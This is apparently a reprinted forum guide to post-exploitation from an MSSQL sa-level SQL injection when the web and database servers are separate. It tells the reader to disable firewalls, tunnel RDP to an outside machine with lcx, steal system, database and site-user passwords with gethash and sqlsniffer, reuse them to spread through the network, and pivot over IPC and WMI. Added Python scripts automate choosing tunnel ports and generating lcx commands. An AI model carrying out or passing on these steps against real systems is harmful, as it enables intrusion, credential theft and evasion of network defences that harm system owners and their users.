You have an injection point running as sa with SYSTEM privileges and can execute commands, but the web server and the database server are separate machines and the database host has no Internet access. What can you do from the web side alone? This article is reprinted from t00ls; it collects some penetration ideas for web/database separation when you hold an sa-level injection point.
Premise: sa injection point, SYSTEM privileges, command execution, web and DB on separate hosts. The DB host cannot reach the Internet (in practice: nothing on it can call back out, so an implant cannot connect back and lcx -slave cannot bounce a connection to you).
1. The DB host has a public IP address
1: Run commands to stop the system firewall and any IP security policy. Run netstat -an, check whether port 3389 is listening, and try to connect to it directly.
2: Scan from the inside out. Convert the command-line s scanner into a VBS dropper, upload it to the DB host and write out the exe, then scan a machine of yours on the Internet that has all ports open (such a machine is easy to find or set up). Any port the scan reports as open is one the DB host can reach outbound, so 3389 can be forwarded out to that external machine over it. For example, if port 80 is reachable: lcx -slave <external ip> 80 127.0.0.1 3389.
3: Collect as many passwords as possible. Upload gethash and sqlsniffer the same way (via VBS) and obtain the system and MSSQL passwords, the administrator password from the site's back-end table, and the first few user passwords from the member table. Try these against the web host's admin back-end, 3389 and FTP. Of course, you must have port-scanned the web host beforehand.
4: nmap scan. Scan ports 1-65535 on both the web and DB hosts. If nmap reports a port on the DB host as closed (rather than filtered), congratulations: a RST came back, so the firewall passes traffic to that port. Use lcx -tran to forward 3389 onto it and log on directly. firewalk has a similar function, but it is useless against a proxy firewall.
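The decision in steps 1 and 4 (is 3389 listening, and which externally "closed" ports are free to bind lcx -tran on) can be made mechanically from the two outputs you already have. The following Python is an added example and is not part of the original t00ls post; the `netstat -an` and `nmap -oG` outputs it parses are constructed samples, and the address 203.0.113.10 and the port numbers in them are assumptions.

```python
import re
from typing import Dict, List, Set

# Constructed sample of `netstat -an` as run on the DB host via xp_cmdshell
# (step 1). Not real engagement output.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    10.0.0.5:1433          10.0.0.9:50212         ESTABLISHED
  UDP    0.0.0.0:1434           *:*
"""

# Constructed sample of `nmap -p- -oG -` run from the attacker's side against
# the DB host's public address (step 4). 203.0.113.10 is a placeholder.
NMAP_GREPABLE_SAMPLE = (
    "# Nmap 7.94 scan initiated as: nmap -p- -oG - 203.0.113.10\n"
    "Host: 203.0.113.10 ()\tStatus: Up\n"
    "Host: 203.0.113.10 ()\tPorts: 53/closed/tcp//domain///, "
    "80/closed/tcp//http///, 443/filtered/tcp//https///, "
    "3389/filtered/tcp//ms-wbt-server///, 8080/closed/tcp//http-proxy///"
    "\tIgnored State: filtered (65530)\n"
    "# Nmap done\n"
)


def listening_tcp_ports(netstat_output: str) -> Set[int]:
    """TCP ports something on the host is already bound to (IPv4 or IPv6)."""
    ports: Set[int] = set()
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            ports.add(int(parts[1].rsplit(":", 1)[1]))
    return ports


def rdp_listening(netstat_output: str) -> bool:
    """Step 1: is Terminal Services bound on 3389 at all?"""
    return 3389 in listening_tcp_ports(netstat_output)


def nmap_port_states(grepable: str) -> Dict[int, str]:
    """Map TCP port -> nmap state ('open', 'closed', 'filtered') from -oG output."""
    states: Dict[int, str] = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) >= 3 and fields[2] == "tcp":
                states[int(fields[0])] = fields[1]
    return states


def lcx_tran_candidates(netstat_output: str, grepable: str) -> List[int]:
    """Ports nmap saw as 'closed' from outside (a RST came back, so the
    firewall passes them) and that nothing on the DB host is bound to yet.
    'filtered' ports are dropped by the firewall and are useless here."""
    local = listening_tcp_ports(netstat_output)
    return sorted(
        port for port, state in nmap_port_states(grepable).items()
        if state == "closed" and port not in local
    )


def lcx_tran_command(listen_port: int, target_port: int = 3389) -> str:
    """The lcx -tran invocation from step 4: listen on the free port and
    relay to the local RDP service."""
    return f"lcx -tran {listen_port} 127.0.0.1 {target_port}"


if __name__ == "__main__":
    print("3389 listening:", rdp_listening(NETSTAT_SAMPLE))
    for port in lcx_tran_candidates(NETSTAT_SAMPLE, NMAP_GREPABLE_SAMPLE):
        print(lcx_tran_command(port))
```

On the sample, 8080 is reported closed from outside but is excluded because the DB host already has a listener on it; 53 and 80 remain as places to bind lcx -tran.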
2. The DB host only has an intranet IP address
1: Try as many passwords as possible with net use against the web host. This takes a lot of patience :). Also try the same passwords against the web back-end login.
2: Stop the firewall and IP security policy, then scan from the inside out as in section 1.
3: If ipconfig /displaydns shows public domain names in the resolver cache, the host has very likely had a route to the outside configured at some point. There is still a chance.
4: Analysing the pattern of the passwords you have collected so far often produces surprises.
5: Use the command execution on the sa point to penetrate the intranet and find a machine that can reach the Internet, for example via isql, IPC shares and WMI.
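Step 3 above is a judgement call: which entries in the DNS cache point outside the intranet? The following Python is an added example and is not part of the original t00ls post; it parses a constructed `ipconfig /displaydns` dump (the host names and addresses in it are assumptions) and flags A records that resolve outside RFC 1918, loopback and link-local space, i.e. names the DB host has recently resolved and most likely reached.

```python
import ipaddress
import re
from typing import List, Tuple

# Constructed sample of `ipconfig /displaydns` as run on the DB host via
# xp_cmdshell. Names and addresses are placeholders, not real cache contents.
DISPLAYDNS_SAMPLE = """
Windows IP Configuration

    crl.microsoft.com
    ----------------------------------------
    Record Name . . . . . : crl.microsoft.com
    Record Type . . . . . : 1
    Time To Live  . . . . : 1800
    Data Length . . . . . : 4
    Section . . . . . . . : Answer
    A (Host) Record . . . : 203.0.113.55

    dbsrv01.corp.local
    ----------------------------------------
    Record Name . . . . . : dbsrv01.corp.local
    Record Type . . . . . : 1
    Time To Live  . . . . : 86400
    Data Length . . . . . : 4
    Section . . . . . . . : Answer
    A (Host) Record . . . : 10.0.0.5

    update.example.net
    ----------------------------------------
    Record Name . . . . . : update.example.net
    Record Type . . . . . : 5
    Time To Live  . . . . : 300
    Data Length . . . . . : 8
    Section . . . . . . . : Answer
    CNAME Record  . . . . : cdn.example.net
"""

# Ranges that never indicate a route to the outside. Checked explicitly rather
# than via ipaddress.is_global so documentation ranges in the sample count as public.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

RECORD_NAME_RE = re.compile(r"Record Name[ .]*:\s*(\S+)")
A_RECORD_RE = re.compile(r"A \(Host\) Record[ .]*:\s*(\S+)")


def is_internal(ip: str) -> bool:
    """True for RFC 1918, loopback and link-local addresses."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_displaydns(output: str) -> List[Tuple[str, str]]:
    """(record name, address) for every A record in the cache dump.
    CNAME-only entries carry no address and are skipped."""
    entries: List[Tuple[str, str]] = []
    name = None
    for line in output.splitlines():
        m = RECORD_NAME_RE.search(line)
        if m:
            name = m.group(1)
            continue
        m = A_RECORD_RE.search(line)
        if m and name:
            entries.append((name, m.group(1)))
    return entries


def outbound_route_hints(output: str) -> List[Tuple[str, str]]:
    """A records resolving outside the intranet: the host resolved (and most
    likely reached) something out there, so a route out exists or existed."""
    return [(n, ip) for n, ip in parse_displaydns(output) if not is_internal(ip)]


if __name__ == "__main__":
    for name, ip in outbound_route_hints(DISPLAYDNS_SAMPLE):
        print(f"{name} -> {ip} (public)")
```

On the sample only crl.microsoft.com is flagged; dbsrv01.corp.local resolves into 10.0.0.0/8 and the CNAME-only entry has no address to judge.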
Some countries or regions block connections from foreign addresses to certain ports, so having a proxy or VPN endpoint inside the target country is important.